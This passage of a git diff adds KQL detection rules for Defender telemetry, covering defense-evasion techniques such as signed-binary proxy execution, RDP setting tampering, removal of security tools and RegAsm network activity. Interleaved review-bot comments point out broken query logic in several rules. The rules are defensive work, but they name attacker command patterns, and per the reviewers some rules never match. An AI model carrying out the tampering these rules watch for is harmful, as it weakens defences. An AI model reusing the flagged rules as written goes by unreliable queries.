+// - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
new file mode 100644
index 00000000..b67708b4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
@@ -0,0 +1,13 @@
+// Title: Process Proxy Execution Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not((((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStart") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains "Discord.exe")) or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe"
and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
new file mode 100644
index 00000000..9ccb15f5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
@@ -0,0 +1,16 @@
+// Title: Proxy Execution via Vshadow
+// Author: David Faiss
+// Date: 2025-05-26
+// Level: medium
+// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.
+VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
+attackers can leverage this parameter to proxy the execution of malware.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - System backup or administrator tools
+// - Legitimate administrative scripts
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-exec" and (FolderPath endswith "\\vshadow.exe" or ProcessVersionInfoOriginalFileName =~ "vshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql
new file mode 100644
index 00000000..14cef805
--- /dev/null
+++ b/KQL/rules/Defense Evasion/proxy_execution_via_wuauclt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Proxy Execution Via Wuauclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..83d5c4da
--- /dev/null
+++ b/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: PSScriptPolicyTest Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where FolderPath contains "__PSScriptPolicyTest_" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\sdiagnhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql
new file mode 100644
index 00000000..96c32fb2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pua_advancedrun_suspicious_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - AdvancedRun Suspicious Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-20
+// Level: high
+// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql
new file mode 100644
index 00000000..bfa23331
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pua_cleanwipe_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - CleanWipe Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administrative use (Should be investigated either way)
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql
new file mode 100644
index 00000000..df5cb69e
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pua_defendercheck_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - DefenderCheck Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.005
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql
new file mode 100644
index 00000000..185532c8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pua_potential_pe_metadata_tamper_using_rcedit.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Potential PE Metadata Tamper Using Rcedit
+// Author: Micah Babinski
+// Date: 2022-12-11
+// Level: medium
+// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
+// False Positives:
+// - Legitimate use of the tool by administrators or users to update metadata of a binary
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
new file mode 100644
index 00000000..875e0868
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
@@ -0,0 +1,15 @@
+// Title: PUA - Process Hacker Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
+Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
+Threat actors abused older vulnerable versions to manipulate system processes.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543
+// False Positives:
+// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis
+
+DeviceProcessEvents
+| where FolderPath contains "\\ProcessHacker_" or FolderPath endswith "\\ProcessHacker.exe" or (ProcessVersionInfoOriginalFileName in~ ("ProcessHacker.exe", "Process Hacker")) or ProcessVersionInfoFileDescription =~ "Process Hacker" or ProcessVersionInfoProductName =~ "Process Hacker" or ((MD5 startswith "68F9B52895F4D34E74112F3129B3B00D" or MD5 startswith "B365AF317AE730A67C936F21432B9C71") or (SHA1 startswith "A0BDFAC3CE1880B32FF9B696458327CE352E3B1D" or SHA1 startswith "C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E") or (SHA256 startswith "D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F" or SHA256 startswith "BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql
new file mode 100644
index 00000000..c694610a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Publisher Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of ".pub" files from those locations
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql
new file mode 100644
index 00000000..f5e7ba81
--- /dev/null
+++ b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql
@@ -0,0 +1,10 @@
+// Title: Pubprn.vbs Proxy Execution
+// Author: frack113
+// Date: 2022-05-28
+// Level: medium
+// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
new file mode 100644
index 00000000..6ed4cedb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
@@ -0,0 +1,12 @@
+// Title: Python Function Execution Security Warning Disabled In Excel
+// Author: @Kostastsale
+// Date: 2023-08-22
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " 0" and (ProcessCommandLine contains "\\Microsoft\\Office\\" and ProcessCommandLine contains "\\Excel\\Security" and ProcessCommandLine contains "PythonFunctionWarnings")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
new file mode 100644
index 00000000..4c02c568
--- /dev/null
+++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
@@ -0,0 +1,12 @@
+// Title: Python Function Execution Security Warning Disabled In Excel - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
+// Date: 2024-08-23
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
new file mode 100644
index 00000000..7a42b235
--- /dev/null
+++ b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
@@ -0,0 +1,17 @@
+// Title: Python Image Load By Non-Python Process
+// Author: Patrick St. John, OTR (Open Threat Research)
+// Date: 2020-05-03
+// Level: low
+// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.
+Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
+Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.002
+// False Positives:
+// - Legitimate Py2Exe Binaries
+// - Known false positive caused with Python Anaconda
+// - Various legitimate software is bundled from Python code into executables
+
+DeviceImageLoadEvents
+| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/raccine_uninstall.kql b/KQL/rules/Defense Evasion/raccine_uninstall.kql
new file mode 100644
index 00000000..18a375f8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/raccine_uninstall.kql
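Review bot: `InitiatingProcessVersionInfoFileDescription =~ "Python Core"` in the `where` clause tests the description of the process that performs the load, whereas the Sigma source's image_load `Description` field describes the loaded image; as converted, the rule fires on loads performed by the Python interpreter itself and then excludes paths containing "Python", which is close to the opposite of the stated intent. If DeviceImageLoadEvents exposes no description column for the loaded module, the nearest approximation is to key on the loaded file name, e.g. `FileName startswith "python"` for the python3*.dll runtime, combined with the existing InitiatingProcessFolderPath exclusions — worth confirming against a known PyInstaller sample before shipping. Since the mapping comes from the converter, its field table should treat `Description` in image_load rules differently from process_creation rules rather than falling back to the initiating-process column.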
@@ -0,0 +1,12 @@
+// Title: Raccine Uninstall
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-21
+// Level: high
+// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate deinstallation by administrative staff
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql
new file mode 100644
index 00000000..bc506662
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: RDP Connection Allowed Via Netsh.EXE
+// Author: Sander Wiebing
+// Date: 2020-05-23
+// Level: high
+// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
new file mode 100644
index 00000000..c11f7694
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
@@ -0,0 +1,14 @@
+// Title: RDP Sensitive Settings Changed
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-08-06
+// Level: high
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
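Review bot: The first two OR branches of the `| where` are dead: `RegistryKey endswith "\\Control\\Terminal Server*"` keeps the Sigma `*` as a literal, and the same key cannot also end in `\Shadow` or `\fAllowUnsolicited`, so only the third branch (the `contains` checks on InitialProgram/ServiceDll) can ever match. Replace the wildcard suffixes with `RegistryKey contains "\\Control\\Terminal Server\\" or RegistryKey contains "\\Windows NT\\Terminal Services\\"`. In DeviceRegistryEvents the value name is a separate column, so the `\Shadow`, `\fAllowUnsolicited` etc. checks belong on `RegistryValueName in~ ("Shadow", "DisableRemoteDesktopAntiAlias", ...)` rather than on the key path, and the `DWORD (0x0000000N)` strings should be verified against how your tenant actually renders `RegistryValueData`.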
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
new file mode 100644
index 00000000..a6cde613
--- /dev/null
+++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
@@ -0,0 +1,14 @@
+// Title: RDP Sensitive Settings Changed to Zero
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-09-29
+// Level: medium
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
new file mode 100644
index 00000000..e7d6a322
--- /dev/null
+++ b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
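Review bot: `RegistryKey endswith "\\fDenyTSConnections"` (and the two sibling checks) looks for the value name at the end of the key path, but in DeviceRegistryEvents the value name is the `RegistryValueName` column and `RegistryKey` stops at the key, so the predicate never matches. The `| where` should read along the lines of `RegistryValueName in~ ("fDenyTSConnections", "fSingleSessionPerUser", "UserAuthentication") and RegistryValueData =~ "0"` — keep the `DWORD (0x00000000)` form only if your telemetry really renders it that way. There is also no key scoping at all, so once the value-name match works, any value called `UserAuthentication` under any key would fire; adding `(RegistryKey contains "\\Terminal Server" or RegistryKey contains "\\Terminal Services")` keeps it to the settings the description names.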
@@ -0,0 +1,14 @@
+// Title: RegAsm.EXE Execution Without CommandLine Flags or Files
+// Author: frack113
+// Date: 2025-06-04
+// Level: low
+// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity.
+Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+// False Positives:
+// - Legitimate use of Regasm by developers.
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "RegAsm" or ProcessCommandLine endswith "RegAsm.exe" or ProcessCommandLine endswith "RegAsm.exe\"" or ProcessCommandLine endswith "RegAsm.exe'") and (FolderPath endswith "\\RegAsm.exe" or ProcessVersionInfoOriginalFileName =~ "RegAsm.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql
new file mode 100644
index 00000000..67a400a8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql
@@ -0,0 +1,10 @@
+// Title: RegAsm.EXE Initiating Network Connection To Public IP
+// Author: frack113
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql
new file mode 100644
index 00000000..921895a9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql
@@ -0,0 +1,12 @@
+// Title: Regedit as Trusted Installer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-27
+// Level: high
+// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql
new file mode 100644
index 00000000..5721ff3d
--- /dev/null
+++ b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql
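Review bot: `ipv4_is_in_range()` returns null for an IPv6 `RemoteIP`, so for every IPv6 connection the whole `not(... or ...)` expression is null and the row is silently dropped — public IPv6 destinations are never alerted, and the `::1/128`, `fe80::/10` and `fc00::/7` entries do nothing. Use `ipv6_is_in_range(RemoteIP, ...)` for those three (it accepts IPv4 literals as well), or replace the whole exclusion list with the `RemoteIPType == "Public"` column that DeviceNetworkEvents already provides. If CGNAT space is in use, `100.64.0.0/10` is a common omission from such lists too.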
@@ -0,0 +1,12 @@
+// Title: REGISTER_APP.VBS Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql
new file mode 100644
index 00000000..5af6576b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql
